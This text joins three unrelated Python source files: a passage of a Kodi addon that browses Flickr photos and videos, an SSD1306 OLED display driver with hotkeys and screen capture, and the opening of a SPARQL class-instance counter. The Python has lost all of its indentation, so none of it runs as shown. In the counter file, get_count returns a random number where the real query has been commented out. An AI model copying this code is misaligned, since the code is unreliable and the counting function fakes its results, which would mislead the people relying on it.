title = L("zeige Videos")
fparams="&fparams={'title': '%s', 'path': '%s', 'user_id': '%s', 'username': '%s', 'realname': '%s'}" %\
(quote(title), quote(path), user_id, quote(username), quote(realname))
addDir(li=li, label=title, action="dirList", dirID="ShowVideos", fanart=R('icon-video.png'),
thumb=R('icon-video.png'), fparams=fparams)
else:
if 'media="video"' in page: # nur Videos
ShowVideos(title,path,user_id,username,realname) # direkt
else: # nur Fotos
ShowPhotoObject(title,path,user_id,username,realname,title_org) # direkt
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#----------------------------------------------------------------
# Caller: BuildPages -> SeparateVideos
# path must contain the matching pagenr
#
# Unlike the photo object in Plex, the images are stored here
# in SLIDESTORE and listed as ListItems
# (button -> single image).
# A final button starts the slideshow (Kodi
# player).
#
# Storage monitoring: CheckStorage - see below
# unique directory name: path2dirname - see below
#
# Note: with repeated calls of a source, the slide directory accumulates
# more images than exist on Flickr (especially the Photostream is updated frequently) -
# the addon does not reconcile them. All images in a directory
# remain until they are deleted by CheckStorage or CleanUp.
#
def ShowPhotoObject(title,path,user_id,username,realname,title_org):
PLog('ShowPhotoObject:')
PLog(title); PLog(title_org)
page, msg = RequestUrl(CallerName='ShowPhotoObject', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
PLog(page[:100])						# result in XML format, processed here as strings
pagenr = stringextract('page="', '"', page)
li = xbmcgui.ListItem()
li = home(li, user_id=user_id, username=username) # Home-Button
records = blockextract('<photo id', '', page)		# ShowPhotoObject: only '<photo id' blocks allowed
PLog('records: %s' % str(len(records)))
extras_list = Dict('load', 'extras_list')
try: # Back in Browser: ValueError: list.remove(x)
extras_list.remove('media')				# the 1st entry 'media' contains no URL
except:
pass
PLog("extras_list: " + str(extras_list));	# for the sizes see BuildExtras
CheckStorage(SLIDESTORE, SETTINGS.getSetting('max_slide_store'))	# check the limit
title = path2dirname(title, path, title_org)		# create the directory name
fname = make_filenames(py2_decode(title))	# OS-conformant handling
PLog(fname);
fpath = '%s/%s' % (SLIDESTORE, fname)
PLog(fpath)
if os.path.isdir(fpath) == False:
try:
os.mkdir(fpath)
except OSError:
msg1 = L('Bildverzeichnis im SLIDESTORE konnte nicht erzeugt werden:')
msg2 = fname
msg3 = "SLIDESTORE: %s" % (SLIDESTORE)
PLog(msg1); PLog(msg2); PLog(msg3)
MyDialog(msg1, msg2, msg3)
return li
image = 0
for s in records:
if 'media="video"' in s:
continue
pid = stringextract('photo id=\"', '\"', s)		# photo id is also present for videos
owner = stringextract('owner=\"', '\"', s)
secret = stringextract('secret=\"', '\"', s)
serverid = stringextract('server=\"', '\"', s)
farmid = stringextract('farm=\"', '\"', s)
descr = stringextract('title=\"', '\"', s)		# addition to "Bild 001"
descr = unescape(descr)
if username:							# replace owner with username + realname
owner = username
if realname:
owner = "%s | %s" % (owner, realname)
# URL format: https://www.flickr.com/services/api/misc.urls.html
thumb_src = 'https://farm%s.staticflickr.com/%s/%s_%s_m.jpg' % (farmid, serverid, pid, secret)	# m=small (240)
# Photo selection - the largest in each case, depending on the preset (if available)
# (a standalone sketch of this size selection follows this function):
Imagesize = L('Bildgroesse')
Imagesize = py2_decode(Imagesize)
if 'url_' in s:							# Favs come without URL
for i in range (len(extras_list)):
url_extra = extras_list[i]
img_src = stringextract('%s=\"' % (url_extra), '\"', s)
suffix = url_extra[-2:]					# e.g. _o from url_o, additionally determine height + width
width = stringextract('width%s=\"' % (suffix), '\"', s)		# e.g. width_o
height = stringextract('height%s=\"' % (suffix), '\"', s)	# e.g. height_o
# PLog(url_extra); PLog(img_src);PLog(suffix);PLog(width);PLog(height);	# if needed
if len(img_src) > 0:					# if this format is not available, continue with the smaller formats
PLog("url_extra: " + url_extra)
break
summ = owner + ' | ' + '%s: %s x %s' % (Imagesize, width, height)
else:									# Favs URL like thumb_src without extra (m)
img_src = 'https://farm%s.staticflickr.com/%s/%s_%s.jpg' % (farmid, serverid, pid, secret)
summ = owner							# if no size information is available
# for original images in albums an additional getSizes call is required:
PLog('Mark0')
if "photosets.getPhotos" in path: # Output ohne Url-Liste für Größen
if SETTINGS.getSetting('max_width') == "Originalbild":
PLog('try_info_call:')
API_KEY = GetKey()
p1 = "https://www.flickr.com/services/rest/?method=flickr.photos.getSizes&api_key=%s" % API_KEY
p2 = "&photo_id=%s&format=rest" % (pid)
info_url = p1 + p2
page, msg = RequestUrl(CallerName='ShowPhotoObject2', url=info_url)
if page:
sizes = blockextract('<size label', '', page)
source=''
for size in sizes:
if '"Original"' in size:
width = stringextract('width="', '"', size)		# e.g. "1600" (read from the size record, not the photo record)
height = stringextract('height="', '"', size)	# e.g. "1200"
source = stringextract('source="', '"', size)
break
else:									# Original may be missing, evaluate the last line (sorted ascending)
width = stringextract('width="', '"', sizes[-1])	# e.g. "3968"
height = stringextract('height="', '"', sizes[-1])	# e.g. "2907"
source = stringextract('source="', '"', sizes[-1])
if source:
img_src = source
summ = owner + ' | ' + '%s: %s x %s' % (Imagesize, width, height)
PLog(descr); PLog(img_src);	# PLog(thumb_src); PLog(pid);PLog(owner);	# if needed
if img_src == '':						# safeguard
msg1 = 'Problem in Bildgalerie: Bild nicht gefunden'
PLog(msg1)
if img_src:
# Kodi needs a file extension for the slideshow; it also accepts extensions
# that do not match the image format
pic_name = 'Bild_%04d_%s.jpg' % (image+1, pid)	# name: Bild + number + pid
local_path = "%s/%s" % (fpath, pic_name)
PLog("local_path: " + local_path)
title = "Bild %03d | %s" % (image+1, descr)
PLog("Bildtitel: " + title)
thumb = img_src							# default: image = URL
local_path = os.path.abspath(local_path)
if os.path.isfile(local_path) == False:	# not available locally - get & store
# 03.10.2019 urlretrieve in a loop slows things down a lot - hence run it in the background
#try:
#urllib.urlretrieve(img_src, local_path)
background_thread = Thread(target=thread_getpic, args=(img_src, local_path))
background_thread.start()
thumb = local_path
#except Exception as exception:
# PLog(str(exception))
else:
thumb = local_path						# available locally - load
thumb_src = thumb						# skip the thumbnail from the farm
tagline = unescape(title_org); tagline = cleanhtml(tagline)
summ = unescape(summ)
PLog('neu:');PLog(title);PLog(thumb);PLog(thumb_src);PLog(summ); PLog(local_path);
if thumb:
# with addDir, the listing cannot be navigated with the cursor keys.
# Therefore we use a separate ListItem for each image.
#fparams="&fparams={'path': '%s', 'single': 'True'}" % urllib2.quote(local_path)
#addDir(li=li, label=title, action="dirList", dirID="SlideShow",
# fanart=thumb, thumb=thumb, fparams=fparams, summary=summ, tagline=tagline)
image += 1
PLog("thumb_src: " + thumb_src)
li = xbmcgui.ListItem()
li.setLabel(title)
# 11.04.2020 setThumbnailImage replaced by setArt
li.setArt({'thumb':thumb_src, 'icon':thumb_src})	# local or farm
li.setInfo(type='image', infoLabels={'Title': title})	# plot is not possible for type image
xbmcplugin.addDirectoryItem(
handle=HANDLE,
url=thumb,			# local or farm
listitem=li,
isFolder=False
)
# SlideShow button - also reachable via the context menu on an image
if image > 0:
fpath=py2_encode(fpath);
fparams="&fparams={'path': '%s'}" % quote(fpath) # fpath: SLIDESTORE/fname
addDir(li=li, label="SlideShow", action="dirList", dirID="SlideShow",
fanart=R('icon-stream.png'), thumb=R('icon-stream.png'), fparams=fparams)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)	# to prevent reloading
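# The helper below is an illustrative, standalone sketch (not called by the addon): it restates
# the size-selection idea used above - walk an "extras" suffix list from largest to smallest
# and return the first url_* attribute present in a photo record. The suffix list and the
# sample record are hypothetical examples, not values taken from BuildExtras.
def example_pick_largest_url(record, extras_list=('url_o', 'url_k', 'url_h', 'url_b', 'url_z')):
    import re as _re
    for url_extra in extras_list:						# largest size first
        m = _re.search(r'%s="([^"]+)"' % url_extra, record)
        if m:											# first hit = largest available size
            return url_extra, m.group(1)
    return None, ''										# record offers no url_* attribute
# Example (hypothetical record): example_pick_largest_url('<photo id="1" url_b="https://live.staticflickr.com/x_b.jpg"/>')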
#----------------------------------------------------------------
def thread_getpic(img_src, local_path):
PLog("thread_getpic:")
PLog(img_src); PLog(local_path);
try:
urlretrieve(img_src, local_path)
except Exception as exception:
PLog("thread_getpic:" + str(exception))
return
#----------------------------------------------------------------
# Called by ShowPhotoObject
# creates a unique directory name from title_org, title + path, e.g.:
# show_photos_158655533				Photostream single-page, preselected user
# show_photos_72157708806994797		Photostream single-page, other user
# Photostream_Page-_1				Photostream in general, page 1
# Photostream_show_photos_158655	Photostream multi-page, preselected user
# Photostream_show_photos_1			Photostream multi-page, page with video(s),
#									called by SeparateVideos
def path2dirname(title, path, title_org):
PLog('path2dirname: ' + path)
PLog(title); PLog(title_org);
dirname=''; dir_id=''
if 'id=' in path: # photoset_id, gallery_id
try:
dir_id = re.search('id=(\d+)',path).group(1)
except Exception as exception:
PLog(str(exception))
dir_id=''
pagenr=''
if title.startswith('Page') == False:	# add pagenr if it is not in the title
if '&page=' in path:
try:
pagenr = re.search('&page=(\d+)', path).group(1)
except Exception as exception:			# the number may be missing (..&text=&..)
PLog(str(exception))
pagenr=''
dirname = "%s_%s" % (title_org, title) # title_org: Photostream o.ä.
if dir_id:
dirname = "%s_%s" % (dirname, dir_id)
if pagenr:
dirname = "%s_%s" % (dirname, pagenr)
PLog(dirname)
return dirname
#----------------------------------------------------------------
# Display of the images stored in SLIDESTORE.
# single=True -> single image
# single=None -> slideshow
#
# clean-up in SLIDESTORE: see module header
#
def SlideShow(path, single=None):
PLog('SlideShow: ' + path)
local_path = os.path.abspath(path)
if single: # single image
return xbmc.executebuiltin('ShowPicture(%s)' % local_path)
else:
PLog(local_path)
return xbmc.executebuiltin('SlideShow(%s, %s)' % (local_path, 'notrandom'))
#----------------------------------------------------------------
# the passed path returns data in XML format
def ShowVideos(title,path,user_id,username,realname):
PLog('ShowVideos:')
# PLog(path)
page, msg = RequestUrl(CallerName='ShowVideos', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100]) # result in XML format, processed here as strings
li = xbmcgui.ListItem()
li = home(li, user_id=user_id, username=username) # Home-Button
records = blockextract('<photo id', '', page)
PLog('records: %s' % str(len(records)))
i=0
for s in records:
if 'media="video"' not in s: # safeguard (should not occur here)
continue
i=i+1
pid = stringextract('id=\"', '\"', s)
owner = stringextract('owner=\"', '\"', s)
secret = stringextract('secret=\"', '\"', s)
serverid = stringextract('server=\"', '\"', s)
farmid = stringextract('farm=\"', '\"', s)
title = stringextract('title=\"', '\"', s)
url = 'https://www.flickr.com/video_download.gne?id=%s' % pid
# the preferred image size is not relevant here, z=smallest is sufficient for a video thumb
img_src = stringextract('url_z="', '"', s)
title = unescape(title) # the web client has problems with foreign characters
if title == '':
title = "Video %s" % str(i)
else:
title = "Video %s | %s" % (str(i), title)
summ = owner
PLog('4Satz:')
PLog(title); PLog(pid); PLog(img_src); PLog(url);
url=py2_encode(url); title=py2_encode(title); img_src=py2_encode(img_src); summ=py2_encode(summ);
fparams="&fparams={'url': '%s', 'title': '%s', 'thumb': '%s', 'Plot': '%s', 'sub_path': '', 'Merk': ''}" %\
(quote(url), quote(title), quote(img_src), quote_plus(summ))
addDir(li=li, label=title, action="dirList", dirID="PlayVideo", fanart=img_src, thumb=img_src, fparams=fparams,
summary=summ)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#----------------------------------------------------------------
# method: Flickr API method
# pagenr must be supplied by the caller
def BuildPath(method, query_flickr, user_id, pagenr, photoset_id=''):
PLog('BuildPath: %s' % method)
PLog(user_id);
query_flickr = unquote(query_flickr)
PLog(query_flickr);
API_KEY = GetKey() # flickr_keys.txt
PATH = "https://api.flickr.com/services/rest/?method=%s&api_key=%s" % (method, API_KEY)
if user_id: # None for a general search
if 'None' not in user_id: # PHT dummy
# user_id = Dict('load', 'nsid') # any user_id from FlickrPeople
PATH = PATH + "&user_id=%s" % (user_id)
# append search string + extras for photo matching -
# see https://www.flickr.com/services/api/flickr.photos.search.html
if 'photos.search' in method or 'favorites.getList' in method or 'photosets' in method or 'galleries.getPhotos' in method:
extras = BuildExtras() # incl. Dict['extras_list'] for photo matching
if query_flickr.startswith('&') and query_flickr.endswith('&'): # from MyPhotostream / MyFaves
query_flickr = '' # list everything
if 'photosets.getList' in method: # primary_photo_extras instead of extras
PATH = PATH + "&text=%s&page=%s&primary_photo_extras=%s&format=rest" % (query_flickr, pagenr, extras)
if 'photosets.getPhotos' in method: # primary_photo_extras instead of extras
PATH = PATH + "&photoset_id=%s&page=%s&primary_photo_extras=%s&format=rest" % (photoset_id, pagenr, extras)
else:
query_flickr = quote(query_flickr)
PATH = PATH + "&text=%s&page=%s&extras=%s&format=rest" % (query_flickr, pagenr, extras)
if SETTINGS.getSetting('sort_order'): # e.g. 1 / date-posted-desc
val = SETTINGS.getSetting('sort_order')
nr = val.split('/')[0].strip()
sortorder = val.split('/')[1].strip()
PLog(type(PATH));PLog(type(sortorder));
PATH = '%s&sort=%s' % (PATH, py2_encode(sortorder))
if pagenr:
PATH = PATH + "&page=%s" % pagenr
# per_page must come last (it may be changed in BuildPages)
if SETTINGS.getSetting('maxPageContent'): # objects per page
mPC = py2_encode(SETTINGS.getSetting('maxPageContent'))
PATH = PATH + "&per_page=%s" % mPC
else:
PATH = PATH + "&per_page=%s" % 500 # API: Maximum
PLog(PATH)
return PATH
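# Example of a resulting PATH for flickr.photos.search (shape only; key, user id and
# query are placeholders, the extras list depends on the 'max_width' setting):
# https://api.flickr.com/services/rest/?method=flickr.photos.search&api_key=<KEY>
# &user_id=<NSID>&text=<query>&page=1&extras=media,url_l,url_c,url_z&format=rest
# &sort=date-posted-desc&per_page=500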
#----------------------------------------------------------------
def GetKey():
API_KEY = RLoad('flickr_keys.txt')
API_KEY = API_KEY.strip()
PLog('flickr_keys.txt geladen')
return API_KEY
#----------------------------------------------------------------
# Called by: MyMenu
# 3 methods: search by user_id, email, username
def GetUserID(user):
PLog('GetUserID:'); PLog(str(user))
API_KEY = GetKey()
if '@' in user:
if '@N' in user: # user_id (nsid)
nsid_url = 'https://api.flickr.com/services/rest/?method=flickr.people.getInfo'
nsid_url = nsid_url + '&user_id=%s' % user
else: # Email
nsid_url = 'https://api.flickr.com/services/rest/?method=flickr.people.findByEmail'
nsid_url = nsid_url + '&find_email=%s' % user
url = nsid_url + '&api_key=%s' % API_KEY
else:
nsid_url = 'https://api.flickr.com/services/rest/?method=flickr.people.findByUsername'
url = nsid_url + '&api_key=%s&username=%s' % (API_KEY, user)
page, msg = RequestUrl(CallerName='MyMenu: get nsid', url=url)
PLog(page[:100])
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
if 'User not found' in page: # Flickr err code
user_id = 'User not found'
else:
user_id = stringextract('id="', '"', page) # user_id / nsid usually identical
nsid = stringextract('nsid="', '"', page)
username = stringextract('<username>', '</username>', page)
realname = stringextract('<realname>', '</realname>', page)
# Dict['user_id'] = user_id # Dicts only for Flickr users (see MyMenu)
return user_id,nsid,username,realname
#----------------------------------------------------------------
def BuildExtras(): # URL parameters for image sizes - depends on settings
# URL request, sorted from large to small - default
# media: output photo or video
extras = "media,url_o,url_k,url_h,url_l,url_c,url_z"
# widths: o = original, k=2048, h=1600, l=1024, c=800, z=640
pref_max_width = SETTINGS.getSetting('max_width')
# pref_max_width = 1600 # Test
if pref_max_width == "Originalbild":
extras = "media,url_o,url_k,url_h,url_l,url_c,url_z"
if pref_max_width == "2048":
extras = "media,url_k,url_h,url_l,url_c,url_z"
if pref_max_width == "1600":
extras = "media,url_h,url_l,url_c,url_z"
if pref_max_width == "1024":
extras = "media,url_l,url_c,url_z"
if pref_max_width == "800":
extras = "media,url_c,url_z"
if pref_max_width == "640":
extras = "media,url_z"
PLog(pref_max_width); PLog(extras)
extras_list = extras.split(",") # for photo selection in search results
Dict('store', 'extras_list', extras_list)
return extras
####################################################################################################
def SearchUpdate(title):
PLog('SearchUpdate:')
li = xbmcgui.ListItem()
ret = updater.update_available(VERSION)
#PLog(ret)
if ret[0] == False:
msg1 = 'Updater: Github-Problem'
msg2 = 'update_available: False'
PLog("%s | %s" % (msg1, msg2))
MyDialog(msg1, msg2, '')
return li
int_lv = ret[0] # version on GitHub
int_lc = ret[1] # current version
latest_version = ret[2] # GitHub version, format 1.4.1
summ = ret[3] # changes
tag = ret[4] # tag, e.g. 029
# e.g.: https://github.com/rols1/Kodi-Addon-ARDundZDF/releases/download/0.5.4/Kodi-Addon-FlickrExplorer.zip
url = 'https://github.com/{0}/releases/download/{1}/{2}.zip'.format(GITHUB_REPOSITORY, latest_version, REPO_NAME)
PLog(int_lv); PLog(int_lc); PLog(latest_version); PLog(summ); PLog(url);
if int_lv > int_lc: # invert for testing (back up the current addon first!)
title = 'Update vorhanden - jetzt installieren'
summary = 'Addon aktuell: ' + VERSION + ', neu auf Github: ' + latest_version
tagline = cleanhtml(summ)
thumb = R(ICON_UPDATER_NEW)
url=py2_encode(url);
fparams="&fparams={'url': '%s', 'ver': '%s'}" % (quote_plus(url), latest_version)
addDir(li=li, label=title, action="dirList", dirID="resources.lib.updater.update",
fanart=R(ICON_UPDATER_NEW), thumb=R(ICON_UPDATER_NEW), fparams=fparams, summary=summary,
tagline=cleanhtml(summ))
title = 'Update abbrechen'
summary = 'weiter im aktuellen Addon'
thumb = R(ICON_UPDATER_NEW)
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R(ICON_UPDATER_NEW),
thumb=R(ICON_UPDATER_NEW), fparams=fparams, summary=summary)
else:
title = 'Addon ist aktuell | weiter zum aktuellen Addon'
summary = 'Addon Version ' + VERSION + ' ist aktuell (kein Update vorhanden)'
summ = summ.splitlines()[0] # only the first changelog line
tagline = "%s | Mehr in changelog.txt" % summ
thumb = R(ICON_OK)
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R(ICON_OK),
thumb=R(ICON_OK), fparams=fparams, summary=summary, tagline=tagline)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=False)
####################################################################################################
# Helper functions - moved out to module util_flickr.py depending on the Kodi version
#----------------------------------------------------------------
def router(paramstring):
# paramstring: dictionary with
# {<parameter>: <value>} elements
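# Example paramstring (shape taken from the fparams strings built elsewhere in this
# addon; the path value is a placeholder):
# ?action=dirList&dirID=SlideShow&fparams={'path': '<SLIDESTORE>/<folder>'}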
paramstring = unquote_plus(paramstring)
PLog(' router_params1: ' + paramstring)
PLog(type(paramstring));
if paramstring:
params = dict(parse_qs(paramstring[1:]))
PLog(' router_params_dict: ' + str(params))
try:
if 'content_type' in params:
if params['content_type'] == 'video': # selection in the addon menu
Main()
PLog('router action: ' + params['action'][0]) # here always action="dirList"
PLog('router dirID: ' + params['dirID'][0])
PLog('router fparams: ' + params['fparams'][0])
except Exception as exception:
PLog(str(exception))
if params['action'][0] == 'dirList': # Aufruf Directory-Listing
newfunc = params['dirID'][0]
func_pars = params['fparams'][0]
# function calls + parameter passing via variables
# see 00_Migration_PLEXtoKodi.txt
# module path always starts at resources - do not shorten it.
if '.' in newfunc: # function inside a module, e.g.:
l = newfunc.split('.') # e.g. resources.lib.updater.update
PLog(l)
newfunc = l[-1:][0] # e.g. updater
dest_modul = '.'.join(l[:-1])
PLog(' router dest_modul: ' + str(dest_modul))
PLog(' router newfunc: ' + str(newfunc))
try:
func = getattr(sys.modules[dest_modul], newfunc)
except Exception as exception:
PLog(str(exception))
func = ''
if func == '': # module not loaded - should not
li = xbmcgui.ListItem() # happen - see addon start
msg1 = "Modul %s ist nicht geladen" % dest_modul
msg2 = "Ursache unbekannt."
PLog(msg1)
MyDialog(msg1, msg2, '')
xbmcplugin.endOfDirectory(HANDLE)
else:
func = getattr(sys.modules[__name__], newfunc) # function in the main program, OK
PLog(' router func_getattr: ' + str(func))
if func_pars != '""': # empty, no parameters?
# PLog(' router func_pars: Ruf mit func_pars')
# func_pars = unquote_plus(func_pars) # unpack quoted url - removed
PLog(' router func_pars unquote_plus: ' + str(func_pars))
try:
# Problem (especially on Windows): parameters containing escape characters (Windows paths)
# must be handled with \\ and thereby become unicode strings. In the functions these
# require a UtfToStr treatment.
# Do not use /n (json.loads: need more than 1 value to unpack)
func_pars = func_pars.replace("'", "\"") # json.loads-compatible string quoting
func_pars = func_pars.replace('\\', '\\\\') # json.loads-compatible Windows paths
PLog("json.loads func_pars: " + func_pars)
PLog('json.loads func_pars type: ' + str(type(func_pars)))
mydict = json.loads(func_pars)
PLog("mydict: " + str(mydict)); PLog(type(mydict))
except Exception as exception:
PLog('router_exception: {0}'.format(str(exception)))
mydict = ''
# PLog(' router func_pars: ' + str(type(mydict)))
if 'dict' in str(type(mydict)): # URL parameters are already available as a dict
mydict = mydict
else:
mydict = dict((k.strip(), v.strip()) for k,v in (item.split('=') for item in func_pars.split(',')))
PLog(' router func_pars: mydict: %s' % str(mydict))
func(**mydict)
else:
func()
else:
PLog('router action-params: ?')
else:
# plugin call without parameters
Main()
#----------------------------------------------------------------
PLog('Addon_URL: ' + PLUGIN_URL) # sys.argv[0], plugin://plugin.image.flickrexplorer/
PLog('ADDON_ID: ' + ADDON_ID); PLog(SETTINGS); PLog(ADDON_NAME);PLog(SETTINGS_LOC);
PLog(ADDON_PATH);PLog(ADDON_VERSION);
PLog('HANDLE: ' + str(HANDLE))
PluginAbsPath = os.path.dirname(os.path.abspath(__file__))
PLog('PluginAbsPath: ' + PluginAbsPath)
PLog('Addon: Start')
if __name__ == '__main__':
try:
router(sys.argv[2])
except Exception as e:
msg = str(e)
PLog('network_error: ' + msg)
|
main.py
|
#!/usr/bin/env python3
## SMBus-SSD1306 by portasynthinca3, 2021
## SSD1306 driver based on thom_tl's C++ code
## Licensed under WTFPL
##
## Read README.md for instructions!
from smbus import SMBus
from PIL import Image, ImageDraw
from threading import Thread
from time import time
import dbus
from pynput import keyboard
import os, sys
from screens import Screen
from config import *
import cv2, numpy
class SSD1306Vals:
CMD_PREFIX = 0x00
DATA_PREFIX = 0x40
MEMORY_MODE = 0x20
COL_ADDR = 0x21
PAGE_ADDR = 0x22
DISABLE_SCROLL = 0x2E
SET_START_LINE = 0x40
SET_CONTRAST = 0x81
SET_CHARGE_PUMP = 0x8D
SET_SEGMENT_REMAP = 0xA0
DISPLAY_VRAM = 0xA4
DISPLAY_FORCE_WHITE = 0xA5
DISPLAY_NORMAL = 0xA6
MULTIPLEX_RATIO = 0xA8
DISPLAY_OFF = 0xAE
DISPLAY_ON = 0xAF
SET_COM_SCAN_DIR = 0xC8
SET_DISPLAY_OFFSET = 0xD3
SET_DISPLAY_CLK_DIV = 0xD5
SET_PRECHARGE_PERIOD = 0xD9
SET_COMPINS = 0xDA
SET_VCOM_LEVEL = 0xDB
class SSD1306:
def __init__(self, bus=0, addr=0x3C):
# create interfacing objects
self.bus = SMBus(bus)
self.addr = addr
self.fb = bytearray([0] * (128 * 64 // 8))
# create PIL objects
self.img = Image.new("1", (128, 64), 0)
self.draw = ImageDraw.Draw(self.img)
def cmd(self, cmd, *args):
self.bus.write_i2c_block_data(self.addr, SSD1306Vals.CMD_PREFIX, [cmd] + list(args))
def data(self, data):
self.bus.write_i2c_block_data(self.addr, SSD1306Vals.DATA_PREFIX, list(data))
def flip(self):
# convert PIL image data into framebuffer data
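# (GDDRAM layout: 8 pages of 128 bytes, each byte covers a column of 8 vertical
# pixels with the least significant bit at the top of the page)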
for coord, pix in enumerate(self.img.getdata()):
x, y = coord % 128, coord // 128
idx, shift = x + ((y // 8) * 128), y & 0x7
if pix == 1:
self.fb[idx] |= 1 << shift
else:
self.fb[idx] &= ~(1 << shift)
# write framebuffer
self.cmd(SSD1306Vals.PAGE_ADDR, 0, 0xFF)
self.cmd(SSD1306Vals.COL_ADDR, 0, 127)
for i in range(0, 128 * 64 // 8, 8):
self.data(self.fb[i : i+8])
def power(self, val):
self.cmd(SSD1306Vals.DISPLAY_ON if val else SSD1306Vals.DISPLAY_OFF)
def init(self):
self.cmd(SSD1306Vals.DISPLAY_OFF)
self.cmd(SSD1306Vals.SET_DISPLAY_CLK_DIV, 0x80) # suggested ratio
self.cmd(SSD1306Vals.MULTIPLEX_RATIO, 63) # height - 1
self.cmd(SSD1306Vals.SET_DISPLAY_OFFSET, 0)
self.cmd(SSD1306Vals.SET_START_LINE | 0)
self.cmd(SSD1306Vals.SET_CHARGE_PUMP, 0x14)
self.cmd(SSD1306Vals.MEMORY_MODE, 0)
self.cmd(SSD1306Vals.SET_SEGMENT_REMAP | 1)
self.cmd(SSD1306Vals.SET_COM_SCAN_DIR)
self.cmd(SSD1306Vals.SET_COMPINS, 0x12)
# drive the display at a lower contrast to prevent burnout
# remember, this poor panel is going to be running 24/7!
# "normal" value: 0xC8
self.cmd(SSD1306Vals.SET_CONTRAST, 0x00)
self.cmd(SSD1306Vals.SET_PRECHARGE_PERIOD, 0xF1)
self.cmd(SSD1306Vals.SET_VCOM_LEVEL, 0x40)
self.cmd(SSD1306Vals.DISPLAY_VRAM)
self.cmd(SSD1306Vals.DISPLAY_NORMAL)
self.cmd(SSD1306Vals.DISABLE_SCROLL)
self.cmd(SSD1306Vals.DISPLAY_ON)
self.flip()
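# Minimal usage sketch (kept as a comment; the bus number and address below are examples,
# the script itself uses I2C_ADAPTER and SSD1306_ADDR from config.py):
# disp = SSD1306(bus=0, addr=0x3C)
# disp.init()
# disp.draw.text((0, 0), "hello", fill=1) # draw onto the attached PIL image
# disp.flip() # push the image to the panel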
forced_screen, screen_fixed = -1, False
screen_id = 0
screen_start = time()
screens = []
capture_frames, capturing = [], False
def force_screen(i):
global forced_screen
forced_screen = i
def fix_screen():
global screen_fixed
screen_fixed = not screen_fixed
def start_capture():
global capturing, capture_frames
capture_frames = []
capturing = True
print("capture started")
def stop_capture():
global capturing, capture_frames
capturing = False
if len(capture_frames) == 0:
return
# get the average fps
last = capture_frames[0][0]
delta = []
for t, _ in capture_frames:
delta.append(t - last)
last = t
delta = delta[1:]
fps = len(delta) / sum(delta)
print(f"calculated fps {fps}, {len(capture_frames)} total frames")
# create a video writer
writer = cv2.VideoWriter(
os.path.join(os.path.expanduser(VIDEO_PATH), "ssd1306_capture.mp4"),
cv2.VideoWriter_fourcc("m", "p", "4", "v"),
fps, (512, 256)
)
# convert all frames to CV format
for _, frame in capture_frames:
frame = cv2.resize(frame, (512, 256), interpolation=cv2.INTER_NEAREST)
writer.write(frame)
writer.release()
print("capture saved")
def toggle_capture():
global capturing
capturing = not capturing
if capturing:
start_capture()
else:
stop_capture()
def drawing_thread(disp: SSD1306):
global screen_id, screen_start, forced_screen, capturing, capture_frames
# init state
screens = [x(disp.draw) for x in Screen.__subclasses__()]
# add hotkeys
hotkeys = {
"<ctrl>+<alt>+f": fix_screen,
"<ctrl>+<alt>+c": toggle_capture
}
for i in range(1, len(screens) + 1):
def _ctx_preserve(x):
hotkeys[f"<ctrl>+<alt>+{i}"] = lambda: force_screen(x - 1)
_ctx_preserve(i)
for s in screens:
hotkeys.update(s.register_hotkeys())
keyboard.GlobalHotKeys(hotkeys).start()
while True:
# update screens
for s in screens:
s.update()
# repaint screen
skip = False
disp.draw.rectangle((0, 0, 127, 63), fill=0)
skip = screens[screen_id].render()
if skip is None: skip = False
if screen_fixed: skip = False
# switch screens every SCREEN_SWITCH_PERIOD seconds
# or if there's nothing to display on the current one
if skip or (not screen_fixed and time() - screen_start >= SCREEN_SWITCH_PERIOD):
screen_id += 1
screen_id %= len(screens)
screen_start = time()
if forced_screen >= 0:
screen_id = forced_screen
forced_screen = -1
screen_start = time()
# draw a rectangle in the top right corner to indicate that the screen is fixed
if screen_fixed:
disp.draw.rectangle((123, 0, 127, 4), fill=1)
if not skip:
# save capture data
if capturing:
capture_frames.append((time(), numpy.array(disp.img.convert("RGB"))))
# transfer data to the display
disp.flip()
if __name__ == "__main__":
display = SSD1306(I2C_ADAPTER, SSD1306_ADDR)
display.init()
# if there's a "blank" argument, clear GDDRAM, power the display down and exit
if "blank" in sys.argv:
display.flip()
display.power(False)
exit()
thr = Thread(target=drawing_thread, args=(display,), name="Drawing thread")
thr.start()
thr.join()
|
InstanceCounter.py
|
from .SparqlInterface.src.ClientFactory import make_client
from .SparqlInterface.src.Interfaces.AbstractClient import AbstractClient
from .SQLiteStore.InstanceCountStore import InstanceCountStore
from .PickleStore.PickleStore import PickleStore
from .FileStore.FileStore import FileStore
from .Utilities.Logger import log
from .Utilities.Utilities import log_progress
from .NTripleLineParser.src.NTripleLineParser import NTripleLineParser
from sqlite3 import IntegrityError
from datetime import datetime
import gevent
import random
def get_count(in_type=None, server=None, store=None):
"""
:param in_type:
:param server:
:type server: AbstractClient
:param store:
:type store: InstanceCountStore
:return:
"""
#return server.count_instances(in_type)
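# NOTE: the real count above is commented out; a random value is returned below,
# presumably as a stand-in for testing.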
r = random.randint(0, 100000)
return r
class InstanceCounter(object):
def __init__(self, server=None, user=None, password=None, n_processes=None, sqlite_db='./data/instance_count.db',
log_level="INFO"):
log.setLevel(log_level)
self.nt_parser = NTripleLineParser(" ")
#self.__store = FileStore("../instance_counts/")
#self.__store = InstanceCountStore(sqlite_db)
self.__store = PickleStore()
self.__server = make_client(server, user, password)
self.number_of_processes = n_processes
def count_all_instances(self, in_file=None):
cur_time = datetime.now()
if in_file:
log.info("Counting with classes from file")
self.use_file_for_classes(in_file)
else:
log.info("Counting with classes from service")
self.use_service_for_classes()
log.info("Done in: " + str(datetime.now() - cur_time))
def use_file_for_classes(self, f):
with open(f) as input_file:
threads = []
tmp_classes = set()
for line_num, line in enumerate(input_file):
triple = self.nt_parser.get_triple(line)
if not triple:
continue
log_progress(line_num, 100)
tmp_classes.add(triple['subject'])
tmp_classes.add(triple['object'])
if len(tmp_classes) >= self.number_of_processes-1:
threads = [gevent.spawn(self.__get_count, t) for t in tmp_classes]
tmp_classes = set()
gevent.joinall(threads)
